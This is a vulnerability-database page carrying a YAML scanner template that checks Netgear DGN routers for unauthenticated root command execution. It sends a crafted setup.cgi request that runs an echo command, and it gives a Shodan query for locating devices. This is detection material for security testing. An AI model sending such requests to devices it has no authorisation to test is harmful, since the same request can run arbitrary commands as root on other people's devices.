漏洞描述
This template checks for unauthenticated command execution vulnerability in Netgear DGN devices. Attackers can bypass authentication mechanisms and execute arbitrary commands with root privileges.
netgear-dgn-rce: Netgear DGN Devices - Command Execution
PoC代码[已公开]
id: netgear-dgn-rce
info:
name: Netgear DGN Devices - Command Execution
author: 3th1c_yuk1
severity: critical
description: |
This template checks for unauthenticated command execution vulnerability in Netgear DGN devices. Attackers can bypass authentication mechanisms and execute arbitrary commands with root privileges.
reference:
- https://www.crowdsec.net/blog/netgear-rce-and-how-vulnerabilities-persist-in-the-wild
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md
metadata:
verified: true
max-request: 1
shodan-query: "NETGEAR DGN"
tags: rce,netgear,dgn,vuln
http:
- method: GET
path:
- "{{BaseURL}}/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo%20{{randstr}}&curpath=/¤tsetting.htm=1"
matchers:
- type: dsl
dsl:
- "contains(body, '{{randstr}}')"
- "!contains(body, 'echo {{randstr}}')"
- "!contains(body, 'echo%20{{randstr}}')"
- "contains(content_type, 'text/plain')"
- "status_code== 200"
condition: and
# digest: 4a0a00473045022056dbdd63148ec6acbc3dfa27e3ed58d29a5902009cb720b91275088ff7bcb9240221008b99dc01a0f848b26a0cee9db5ff0b493f899339614e755724d598ec92bbe608:922c64590222798bb761d5b6d8e72950